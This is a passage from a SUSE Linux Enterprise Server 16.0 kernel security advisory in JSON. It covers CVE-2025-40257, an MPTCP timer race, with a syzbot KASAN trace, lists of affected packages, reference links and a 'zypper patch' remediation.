"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-40195"
},
{
"cve": "CVE-2025-40257",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40257"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix a race in mptcp_pm_del_add_timer()\n\nmptcp_pm_del_add_timer() can call sk_stop_timer_sync(sk, \u0026entry-\u003eadd_timer)\nwhile another might have free entry already, as reported by syzbot.\n\nAdd RCU protection to fix this issue.\n\nAlso change confusing add_timer variable with stop_timer boolean.\n\nsyzbot report:\n\nBUG: KASAN: slab-use-after-free in __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\nRead of size 4 at addr ffff8880311e4150 by task kworker/1:1/44\n\nCPU: 1 UID: 0 PID: 44 Comm: kworker/1:1 Not tainted syzkaller #0 PREEMPT_{RT,(full)}\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/02/2025\nWorkqueue: events mptcp_worker\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0x189/0x250 lib/dump_stack.c:120\n print_address_description mm/kasan/report.c:378 [inline]\n print_report+0xca/0x240 mm/kasan/report.c:482\n kasan_report+0x118/0x150 mm/kasan/report.c:595\n __timer_delete_sync+0x372/0x3f0 kernel/time/timer.c:1616\n sk_stop_timer_sync+0x1b/0x90 net/core/sock.c:3631\n mptcp_pm_del_add_timer+0x283/0x310 net/mptcp/pm.c:362\n mptcp_incoming_options+0x1357/0x1f60 net/mptcp/options.c:1174\n tcp_data_queue+0xca/0x6450 net/ipv4/tcp_input.c:5361\n tcp_rcv_established+0x1335/0x2670 net/ipv4/tcp_input.c:6441\n tcp_v4_do_rcv+0x98b/0xbf0 net/ipv4/tcp_ipv4.c:1931\n tcp_v4_rcv+0x252a/0x2dc0 net/ipv4/tcp_ipv4.c:2374\n ip_protocol_deliver_rcu+0x221/0x440 net/ipv4/ip_input.c:205\n ip_local_deliver_finish+0x3bb/0x6f0 net/ipv4/ip_input.c:239\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
